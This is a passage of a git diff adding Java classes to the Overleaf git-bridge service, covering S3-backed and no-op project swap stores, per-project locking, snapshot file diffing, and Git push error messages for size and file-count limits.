+ */ +public class NoopSwapStore implements SwapStore { + + public NoopSwapStore(SwapStoreConfig __) {} + + @Override + public void upload(String projectName, InputStream uploadStream, long contentLength) {} + + @Override + public InputStream openDownloadStream(String projectName) { + return new ByteArrayInputStream(new byte[0]); + } + + @Override + public void remove(String projectName) {} + + @Override + public boolean isSafe() { + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStore.java new file mode 100644 index 0000000..34e87db --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStore.java @@ -0,0 +1,64 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import com.amazonaws.auth.AWSStaticCredentialsProvider; +import com.amazonaws.auth.BasicAWSCredentials; +import com.amazonaws.services.s3.AmazonS3; +import com.amazonaws.services.s3.AmazonS3ClientBuilder; +import com.amazonaws.services.s3.model.*; +import java.io.InputStream; + +/* + * Created by winston on 21/08/2016. + */ +public class S3SwapStore implements SwapStore { + + private final AmazonS3 s3; + + private final String bucketName; + + public S3SwapStore(SwapStoreConfig cfg) { + this(cfg.getAwsAccessKey(), cfg.getAwsSecret(), cfg.getS3BucketName(), cfg.getAwsRegion()); + } + + S3SwapStore(String accessKey, String secret, String bucketName, String region) { + String regionToUse = null; + if (region == null) { + regionToUse = "us-east-1"; + } else { + regionToUse = region; + } + s3 = + AmazonS3ClientBuilder.standard() + .withRegion(regionToUse) + .withCredentials( + new AWSStaticCredentialsProvider(new BasicAWSCredentials(accessKey, secret))) + .build(); + this.bucketName = bucketName; + } + + @Override + public void upload(String projectName, InputStream uploadStream, long contentLength) { + ObjectMetadata metadata = new ObjectMetadata(); + metadata.setContentLength(contentLength); + PutObjectRequest put = new PutObjectRequest(bucketName, projectName, uploadStream, metadata); + PutObjectResult res = s3.putObject(put); + } + + @Override + public InputStream openDownloadStream(String projectName) { + GetObjectRequest get = new GetObjectRequest(bucketName, projectName); + S3Object res = s3.getObject(get); + return res.getObjectContent(); + } + + @Override + public void remove(String projectName) { + DeleteObjectRequest del = new DeleteObjectRequest(bucketName, projectName); + s3.deleteObject(del); + } + + @Override + public boolean isSafe() { + return true; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStore.java new file mode 100644 index 0000000..3cf7cf2 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStore.java @@ -0,0 +1,43 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import java.io.IOException; +import java.io.InputStream; +import java.util.HashMap; +import java.util.Map; +import java.util.Optional; +import java.util.function.Function; + +/* + * Created by winston on 20/08/2016. 
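+ *
+ * Selection sketch (annotation, not part of the original comment): the store
+ * type is looked up by name in the swapStores map, and a missing config falls
+ * back to the no-op store:
+ *
+ *   SwapStore store = SwapStore.fromConfig(Optional.empty());  // NoopSwapStore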
+ */ +public interface SwapStore { + + Map<String, Function<SwapStoreConfig, SwapStore>> swapStores = + new HashMap<String, Function<SwapStoreConfig, SwapStore>>() { + + { + put("noop", NoopSwapStore::new); + put("memory", InMemorySwapStore::new); + put("s3", S3SwapStore::new); + } + }; + + static SwapStore fromConfig(Optional<SwapStoreConfig> cfg) { + SwapStoreConfig cfg_ = cfg.orElse(SwapStoreConfig.NOOP); + String type = cfg_.getType(); + return swapStores.get(type).apply(cfg_); + } + + void upload(String projectName, InputStream uploadStream, long contentLength) throws IOException; + + InputStream openDownloadStream(String projectName); + + void remove(String projectName); + + /* + * Returns true if the swap store safely persists swapped projects. + * + * Fake swap stores should return false. + */ + boolean isSafe(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStoreConfig.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStoreConfig.java new file mode 100644 index 0000000..d0cc806 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/swap/store/SwapStoreConfig.java @@ -0,0 +1,64 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +/* + * Created by winston on 24/08/2016. + */ +public class SwapStoreConfig { + + public static final SwapStoreConfig NOOP = new SwapStoreConfig("noop", null, null, null, null); + + private String type; + private String awsAccessKey; + private String awsSecret; + private String s3BucketName; + private String awsRegion; + + public SwapStoreConfig() {} + + public SwapStoreConfig( + String awsAccessKey, String awsSecret, String s3BucketName, String awsRegion) { + this("s3", awsAccessKey, awsSecret, s3BucketName, awsRegion); + } + + SwapStoreConfig( + String type, String awsAccessKey, String awsSecret, String s3BucketName, String awsRegion) { + this.type = type; + this.awsAccessKey = awsAccessKey; + this.awsSecret = awsSecret; + this.s3BucketName = s3BucketName; + this.awsRegion = awsRegion; + } + + public String getType() { + return type; + } + + public String getAwsAccessKey() { + return awsAccessKey; + } + + public String getAwsSecret() { + return awsSecret; + } + + public String getS3BucketName() { + return s3BucketName; + } + + public String getAwsRegion() { + return awsRegion; + } + + public SwapStoreConfig sanitisedCopy() { + return new SwapStoreConfig( + type, + awsAccessKey == null ? null : "<awsAccessKey>", + awsSecret == null ? null : "<awsSecret>", + s3BucketName, + awsRegion); + } + + public static SwapStoreConfig sanitisedCopy(SwapStoreConfig swapStore) { + return swapStore == null ? null : swapStore.sanitisedCopy(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/util/CastUtil.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/util/CastUtil.java new file mode 100644 index 0000000..079b485 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/util/CastUtil.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.bridge.util; + +import com.google.common.base.Preconditions; + +/* + * Created by winston on 01/07/2017. 
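+ *
+ * Example (annotation, not part of the original comment):
+ *
+ *   int ok = CastUtil.assumeInt(42L);        // returns 42
+ *   CastUtil.assumeInt(1L << 40);            // throws IllegalArgumentException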
+ */ +public class CastUtil { + + public static int assumeInt(long l) { + Preconditions.checkArgument( + l <= (long) Integer.MAX_VALUE && l >= (long) Integer.MIN_VALUE, + l + " cannot fit inside an int"); + return (int) l; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CandidateSnapshot.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CandidateSnapshot.java new file mode 100644 index 0000000..52689b8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CandidateSnapshot.java @@ -0,0 +1,130 @@ +package uk.ac.ic.wlgitbridge.data; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.io.File; +import java.io.IOException; +import java.util.LinkedList; +import java.util.List; +import java.util.Map; +import java.util.Map.Entry; +import uk.ac.ic.wlgitbridge.data.filestore.RawDirectory; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class CandidateSnapshot implements AutoCloseable { + + private final String projectName; + private final int currentVersion; + private final List<ServletFile> files; + private final List<String> deleted; + private File attsDirectory; + + public CandidateSnapshot( + String projectName, + int currentVersion, + RawDirectory directoryContents, + RawDirectory oldDirectoryContents) { + this.projectName = projectName; + this.currentVersion = currentVersion; + files = diff(directoryContents, oldDirectoryContents); + deleted = deleted(directoryContents, oldDirectoryContents); + } + + private List<ServletFile> diff( + RawDirectory directoryContents, RawDirectory oldDirectoryContents) { + List<ServletFile> files = new LinkedList<ServletFile>(); + Map<String, RawFile> fileTable = directoryContents.getFileTable(); + Map<String, RawFile> oldFileTable = oldDirectoryContents.getFileTable(); + for (Entry<String, RawFile> entry : fileTable.entrySet()) { + RawFile file = entry.getValue(); + files.add(new ServletFile(file, oldFileTable.get(file.getPath()))); + } + return files; + } + + private List<String> deleted(RawDirectory directoryContents, RawDirectory oldDirectoryContents) { + List<String> deleted = new LinkedList<String>(); + Map<String, RawFile> fileTable = directoryContents.getFileTable(); + for (Entry<String, RawFile> entry : oldDirectoryContents.getFileTable().entrySet()) { + String path = entry.getKey(); + RawFile newFile = fileTable.get(path); + if (newFile == null) { + deleted.add(path); + } + } + return deleted; + } + + public void writeServletFiles(File rootGitDirectory) throws IOException { + attsDirectory = new File(rootGitDirectory, ".wlgb/atts/" + projectName); + for (ServletFile file : files) { + if (file.isChanged()) { + file.writeToDiskWithName(attsDirectory, file.getUniqueIdentifier()); + } + } + } + + public void deleteServletFiles() throws IOException { + if (attsDirectory != null) { + Util.deleteDirectory(attsDirectory); + } + } + + public JsonElement getJsonRepresentation(String postbackKey) { + String projectURL = Util.getPostbackURL() + "api/" + projectName; + JsonObject jsonObject = new JsonObject(); + jsonObject.addProperty("latestVerId", currentVersion); + jsonObject.add("files", getFilesAsJson(projectURL, postbackKey)); + jsonObject.addProperty("postbackUrl", projectURL + "/" + postbackKey + "/postback"); + return jsonObject; + } + + private JsonArray getFilesAsJson(String projectURL, String postbackKey) { + 
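+    // (Annotation, not part of the original method.) Builds the "files" array
+    // of the push payload: every file gets a "name", and changed files also
+    // get a postback "url" from which the web service can fetch the new
+    // contents (see getFileAsJson below).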
JsonArray filesArray = new JsonArray(); + for (ServletFile file : files) { + filesArray.add(getFileAsJson(file, projectURL, postbackKey)); + } + return filesArray; + } + + private JsonObject getFileAsJson(ServletFile file, String projectURL, String postbackKey) { + JsonObject jsonFile = new JsonObject(); + jsonFile.addProperty("name", file.getPath()); + if (file.isChanged()) { + String identifier = file.getUniqueIdentifier(); + String url = projectURL + "/" + identifier + "?key=" + postbackKey; + jsonFile.addProperty("url", url); + } + return jsonFile; + } + + public String getProjectName() { + return projectName; + } + + public List<String> getDeleted() { + return deleted; + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(); + sb.append("VersionId: "); + sb.append(currentVersion); + sb.append(", files: "); + sb.append(files); + sb.append(", deleted: "); + sb.append(deleted); + return sb.toString(); + } + + @Override + public void close() throws IOException { + deleteServletFiles(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CannotAcquireLockException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CannotAcquireLockException.java new file mode 100644 index 0000000..e28af65 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/CannotAcquireLockException.java @@ -0,0 +1,9 @@ +package uk.ac.ic.wlgitbridge.data; + +public class CannotAcquireLockException extends Exception { + String projectName; + + public CannotAcquireLockException() { + super("Another operation is in progress. Please try again later."); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/LockAllWaiter.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/LockAllWaiter.java new file mode 100644 index 0000000..ae67da2 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/LockAllWaiter.java @@ -0,0 +1,9 @@ +package uk.ac.ic.wlgitbridge.data; + +/* + * Created by Winston on 21/02/15. + */ +public interface LockAllWaiter { + + void threadsRemaining(int threads); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ProjectLockImpl.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ProjectLockImpl.java new file mode 100644 index 0000000..0d5475d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ProjectLockImpl.java @@ -0,0 +1,96 @@ +package uk.ac.ic.wlgitbridge.data; + +import java.util.HashMap; +import java.util.Map; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.locks.Lock; +import java.util.concurrent.locks.ReentrantLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 20/11/14. 
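+ *
+ * Two-level locking scheme: each project operation holds its own per-project
+ * lock plus the shared read lock, while lockAll() takes the write lock and so
+ * blocks until all in-flight project operations have finished. A typical
+ * caller does (sketch):
+ *
+ *   lock.lockForProject(projectName);
+ *   try {
+ *     // sync or push the repository
+ *   } finally {
+ *     lock.unlockForProject(projectName);
+ *   }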
+ */ +public class ProjectLockImpl implements ProjectLock { + + private final Map<String, Lock> projectLocks; + private final ReentrantReadWriteLock rwlock; + private final Lock rlock; + private final ReentrantReadWriteLock.WriteLock wlock; + private LockAllWaiter waiter; + private boolean waiting; + + public ProjectLockImpl() { + projectLocks = new HashMap<String, Lock>(); + rwlock = new ReentrantReadWriteLock(); + rlock = rwlock.readLock(); + wlock = rwlock.writeLock(); + waiting = false; + } + + public ProjectLockImpl(LockAllWaiter waiter) { + this(); + setWaiter(waiter); + } + + @Override + public void lockForProject(String projectName) throws CannotAcquireLockException { + Log.debug("[{}] taking project lock", projectName); + Lock projectLock = getLockForProjectName(projectName); + try { + if (!projectLock.tryLock(5, TimeUnit.SECONDS)) { + Log.debug("[{}] failed to acquire project lock", projectName); + throw new CannotAcquireLockException(); + } + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + Log.debug("[{}] taking reentrant lock", projectName); + rlock.lock(); + Log.debug("[{}] taken locks", projectName); + } + + @Override + public void unlockForProject(String projectName) { + Log.debug("[{}] releasing project lock", projectName); + getLockForProjectName(projectName).unlock(); + Log.debug("[{}] releasing reentrant lock", projectName); + rlock.unlock(); + Log.debug("[{}] released locks", projectName); + if (waiting) { + Log.debug("[{}] waiting for remaining threads", projectName); + trySignal(); + } + } + + private void trySignal() { + int threads = rwlock.getReadLockCount(); + Log.debug("-> waiting for {} threads", threads); + if (waiter != null && threads > 0) { + waiter.threadsRemaining(threads); + } + Log.debug("-> finished waiting for threads"); + } + + public void lockAll() { + Log.debug("-> locking all threads"); + waiting = true; + trySignal(); + Log.debug("-> locking reentrant write lock"); + wlock.lock(); + } + + private synchronized Lock getLockForProjectName(String projectName) { + Lock lock = projectLocks.get(projectName); + if (lock == null) { + lock = new ReentrantLock(); + projectLocks.put(projectName, lock); + } + return lock; + } + + public void setWaiter(LockAllWaiter waiter) { + this.waiter = waiter; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ServletFile.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ServletFile.java new file mode 100644 index 0000000..acf12f9 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/ServletFile.java @@ -0,0 +1,48 @@ +package uk.ac.ic.wlgitbridge.data; + +import java.util.UUID; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; + +/* + * Created by Winston on 21/02/15. 
+ */ +public class ServletFile extends RawFile { + + private final RawFile file; + private final boolean changed; + private String uuid; + + public ServletFile(RawFile file, RawFile oldFile) { + this.file = file; + this.uuid = UUID.randomUUID().toString(); + changed = !equals(oldFile); + } + + public String getUniqueIdentifier() { + return uuid; + } + + @Override + public String getPath() { + return file.getPath(); + } + + @Override + public byte[] getContents() { + return file.getContents(); + } + + @Override + public long size() { + return getContents().length; + } + + public boolean isChanged() { + return changed; + } + + @Override + public String toString() { + return getPath(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/GitDirectoryContents.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/GitDirectoryContents.java new file mode 100644 index 0000000..cc53c98 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/GitDirectoryContents.java @@ -0,0 +1,76 @@ +package uk.ac.ic.wlgitbridge.data.filestore; + +import java.io.File; +import java.io.IOException; +import java.util.Date; +import java.util.List; +import uk.ac.ic.wlgitbridge.data.model.Snapshot; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 14/11/14. + */ +public class GitDirectoryContents { + + private final List<RawFile> files; + private final File gitDirectory; + private final String userName; + private final String userEmail; + private final String commitMessage; + private final Date when; + + public GitDirectoryContents( + List<RawFile> files, + File rootGitDirectory, + String projectName, + String userName, + String userEmail, + String commitMessage, + Date when) { + this.files = files; + this.gitDirectory = new File(rootGitDirectory, projectName); + this.userName = userName; + this.userEmail = userEmail; + this.commitMessage = commitMessage; + this.when = when; + } + + public GitDirectoryContents( + List<RawFile> files, File rootGitDirectory, String projectName, Snapshot snapshot) { + this( + files, + rootGitDirectory, + projectName, + snapshot.getUserName(), + snapshot.getUserEmail(), + snapshot.getComment(), + snapshot.getCreatedAt()); + } + + public void write() throws IOException { + Util.deleteInDirectoryApartFrom(gitDirectory, ".git"); + for (RawFile fileNode : files) { + fileNode.writeToDisk(gitDirectory); + } + } + + public File getDirectory() { + return gitDirectory; + } + + public String getUserName() { + return userName; + } + + public String getUserEmail() { + return userEmail; + } + + public String getCommitMessage() { + return commitMessage; + } + + public Date getWhen() { + return when; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawDirectory.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawDirectory.java new file mode 100644 index 0000000..ccaf3f8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawDirectory.java @@ -0,0 +1,19 @@ +package uk.ac.ic.wlgitbridge.data.filestore; + +import java.util.Map; + +/* + * Created by Winston on 16/11/14. 
+ */
+public class RawDirectory {
+
+  private final Map<String, RawFile> fileTable;
+
+  public RawDirectory(Map<String, RawFile> fileTable) {
+    this.fileTable = fileTable;
+  }
+
+  public Map<String, RawFile> getFileTable() {
+    return fileTable;
+  }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawFile.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawFile.java
new file mode 100644
index 0000000..a0056ec
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RawFile.java
@@ -0,0 +1,43 @@
+package uk.ac.ic.wlgitbridge.data.filestore;
+
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.OutputStream;
+import java.util.Arrays;
+import uk.ac.ic.wlgitbridge.util.Log;
+
+/*
+ * Created by Winston on 16/11/14.
+ */
+public abstract class RawFile {
+
+  public abstract String getPath();
+
+  public abstract byte[] getContents();
+
+  public abstract long size();
+
+  public final void writeToDisk(File directory) throws IOException {
+    writeToDiskWithName(directory, getPath());
+  }
+
+  public final void writeToDiskWithName(File directory, String name) throws IOException {
+    File file = new File(directory, name);
+    file.getParentFile().mkdirs();
+    file.createNewFile();
+    try (OutputStream out = new FileOutputStream(file)) {
+      out.write(getContents());
+    }
+    Log.debug("Wrote file: {}", file.getAbsolutePath());
+  }
+
+  @Override
+  public boolean equals(Object obj) {
+    if (!(obj instanceof RawFile)) {
+      return false;
+    }
+    RawFile that = (RawFile) obj;
+    return getPath().equals(that.getPath()) && Arrays.equals(getContents(), that.getContents());
+  }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RepositoryFile.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RepositoryFile.java
new file mode 100644
index 0000000..5bb6ab3
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/filestore/RepositoryFile.java
@@ -0,0 +1,30 @@
+package uk.ac.ic.wlgitbridge.data.filestore;
+
+/*
+ * Created by Winston on 16/11/14.
+ */
+public class RepositoryFile extends RawFile {
+
+  private final String path;
+  private final byte[] contents;
+
+  public RepositoryFile(String path, byte[] contents) {
+    this.path = path;
+    this.contents = contents;
+  }
+
+  @Override
+  public String getPath() {
+    return path;
+  }
+
+  @Override
+  public byte[] getContents() {
+    return contents;
+  }
+
+  @Override
+  public long size() {
+    return contents.length;
+  }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/model/Snapshot.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/model/Snapshot.java
new file mode 100644
index 0000000..bfd2e80
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/data/model/Snapshot.java
@@ -0,0 +1,75 @@
+package uk.ac.ic.wlgitbridge.data.model;
+
+import java.util.Date;
+import java.util.List;
+import org.joda.time.DateTime;
+import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotAttachment;
+import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotData;
+import uk.ac.ic.wlgitbridge.snapshot.getforversion.SnapshotFile;
+import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.SnapshotInfo;
+import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.WLUser;
+
+/*
+ * Created by Winston on 03/11/14.
+ */ +public class Snapshot implements Comparable<Snapshot> { + + private final int versionID; + private final String comment; + private final String userName; + private final String userEmail; + private final Date createdAt; + + private final List<SnapshotFile> srcs; + private final List<SnapshotAttachment> atts; + + public Snapshot(SnapshotInfo info, SnapshotData data) { + versionID = info.getVersionId(); + comment = info.getComment(); + WLUser user = info.getUser(); + userName = user.getName(); + userEmail = user.getEmail(); + createdAt = new DateTime(info.getCreatedAt()).toDate(); + + srcs = data.getSrcs(); + atts = data.getAtts(); + } + + public int getVersionID() { + return versionID; + } + + public String getComment() { + return comment; + } + + public String getUserName() { + return userName; + } + + public String getUserEmail() { + return userEmail; + } + + public List<SnapshotFile> getSrcs() { + return srcs; + } + + public List<SnapshotAttachment> getAtts() { + return atts; + } + + public Date getCreatedAt() { + return createdAt; + } + + @Override + public int compareTo(Snapshot snapshot) { + return Integer.compare(versionID, snapshot.versionID); + } + + @Override + public String toString() { + return String.valueOf(versionID); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/FileLimitExceededException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/FileLimitExceededException.java new file mode 100644 index 0000000..0a4b39c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/FileLimitExceededException.java @@ -0,0 +1,31 @@ +package uk.ac.ic.wlgitbridge.git.exception; + +import java.util.Arrays; +import java.util.List; + +public class FileLimitExceededException extends GitUserException { + + private final long numFiles; + + private final long maxFiles; + + public FileLimitExceededException(long numFiles, long maxFiles) { + this.numFiles = numFiles; + this.maxFiles = maxFiles; + } + + @Override + public String getMessage() { + return "too many files"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList( + "repository contains " + + numFiles + + " files, which exceeds the limit of " + + maxFiles + + " files"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/GitUserException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/GitUserException.java new file mode 100644 index 0000000..ed8716e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/GitUserException.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.git.exception; + +import java.util.List; + +/* + * Created by winston on 20/08/2016. 
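+ *
+ * Base class for errors that are reported back to the Git client rather than
+ * only logged: the message becomes the rejection reason, and each description
+ * line is relayed as a hint (see WriteLatexPutHook#handleSnapshotPostException),
+ * so on a push the user sees something like (illustrative numbers):
+ *
+ *   remote: hint: repository contains 2500 files, which exceeds the limit of 2000 files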
+ */ +public abstract class GitUserException extends Exception { + + public abstract String getMessage(); + + public abstract List<String> getDescriptionLines(); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/InvalidGitRepository.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/InvalidGitRepository.java new file mode 100644 index 0000000..404189d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/InvalidGitRepository.java @@ -0,0 +1,20 @@ +package uk.ac.ic.wlgitbridge.git.exception; + +import java.util.Arrays; +import java.util.List; + +public class InvalidGitRepository extends GitUserException { + + @Override + public String getMessage() { + return "invalid git repo"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList( + "Your Git repository contains a reference we cannot resolve.", + "If your project contains a Git submodule,", + "please remove it and try again."); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SizeLimitExceededException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SizeLimitExceededException.java new file mode 100644 index 0000000..c6d0787 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SizeLimitExceededException.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.git.exception; + +import java.util.Arrays; +import java.util.List; +import java.util.Optional; +import uk.ac.ic.wlgitbridge.util.Util; + +public class SizeLimitExceededException extends GitUserException { + + private final Optional<String> path; + + private final long actualSize; + + private final long maxSize; + + public SizeLimitExceededException(Optional<String> path, long actualSize, long maxSize) { + this.path = path; + this.actualSize = actualSize; + this.maxSize = maxSize; + } + + @Override + public String getMessage() { + return "file too big"; + } + + @Override + public List<String> getDescriptionLines() { + String filename = path.isPresent() ? "File '" + path.get() + "' is" : "There's a file"; + return Arrays.asList( + filename + " too large to push to " + Util.getServiceName() + " via git", + "the recommended maximum file size is 50 MiB"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SnapshotAPIException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SnapshotAPIException.java new file mode 100644 index 0000000..733e156 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/exception/SnapshotAPIException.java @@ -0,0 +1,8 @@ +package uk.ac.ic.wlgitbridge.git.exception; + +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; + +/* + * Created by winston on 20/08/2016. 
+ */ +public abstract class SnapshotAPIException extends GitUserException implements JSONSource {} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLReceivePackFactory.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLReceivePackFactory.java new file mode 100644 index 0000000..b8392cf --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLReceivePackFactory.java @@ -0,0 +1,68 @@ +package uk.ac.ic.wlgitbridge.git.handler; + +import com.google.api.client.auth.oauth2.Credential; +import java.util.Optional; +import javax.servlet.http.HttpServletRequest; +import org.eclipse.jgit.lib.Repository; +import org.eclipse.jgit.transport.ReceivePack; +import org.eclipse.jgit.transport.resolver.ReceivePackFactory; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.git.handler.hook.WriteLatexPutHook; +import uk.ac.ic.wlgitbridge.server.Oauth2Filter; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 02/11/14. + */ +/* + * One of the "big three" interfaces created by {@link WLGitServlet} to handle + * user Git requests. + * + * This class just puts a {@link WriteLatexPutHook} into the {@link ReceivePack} + * that it returns. + */ +public class WLReceivePackFactory implements ReceivePackFactory<HttpServletRequest> { + + private final RepoStore repoStore; + + private final Bridge bridge; + + public WLReceivePackFactory(RepoStore repoStore, Bridge bridge) { + this.repoStore = repoStore; + this.bridge = bridge; + } + + /* + * Puts a {@link WriteLatexPutHook} into the returned {@link ReceivePack}. + * + * The {@link WriteLatexPutHook} needs our hostname, which we get from the + * original {@link HttpServletRequest}, used to provide a postback URL to + * the {@link SnapshotApi}. We also give it the oauth2 that we injected in + * the {@link Oauth2Filter}, and the {@link Bridge}. + * + * At this point, the repository will have been synced to the latest on + * Overleaf, but it's possible that an update happens on Overleaf while our + * put hook is running. In this case, we fail, and the user tries again, + * triggering another sync, and so on. 
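+   *
+   * For reference, {@link WLGitServlet} installs this factory with
+   * setReceivePackFactory(new WLReceivePackFactory(repoStore, bridge)), so
+   * every push to the bridge passes through the hook configured here.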
+   * @param httpServletRequest the original request
+   * @param repository the JGit {@link Repository} provided by
+   *     {@link WLRepositoryResolver}
+   * @return a correctly hooked {@link ReceivePack}
+   */
+  @Override
+  public ReceivePack create(HttpServletRequest httpServletRequest, Repository repository) {
+    Log.debug("[{}] Creating receive-pack", repository.getWorkTree().getName());
+    Optional<Credential> oauth2 =
+        Optional.ofNullable(
+            (Credential) httpServletRequest.getAttribute(Oauth2Filter.ATTRIBUTE_KEY));
+    ReceivePack receivePack = new ReceivePack(repository);
+    String hostname = Util.getPostbackURL();
+    if (hostname == null) {
+      hostname = httpServletRequest.getLocalName();
+    }
+    receivePack.setPreReceiveHook(new WriteLatexPutHook(repoStore, bridge, hostname, oauth2));
+    return receivePack;
+  }
+}
diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLRepositoryResolver.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLRepositoryResolver.java
new file mode 100644
index 0000000..d9ddbda
--- /dev/null
+++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/git/handler/WLRepositoryResolver.java
@@ -0,0 +1,112 @@
+package uk.ac.ic.wlgitbridge.git.handler;
+
+import com.google.api.client.auth.oauth2.Credential;
+import java.io.IOException;
+import java.util.Optional;
+import javax.servlet.http.HttpServletRequest;
+import org.eclipse.jgit.errors.RepositoryNotFoundException;
+import org.eclipse.jgit.lib.Repository;
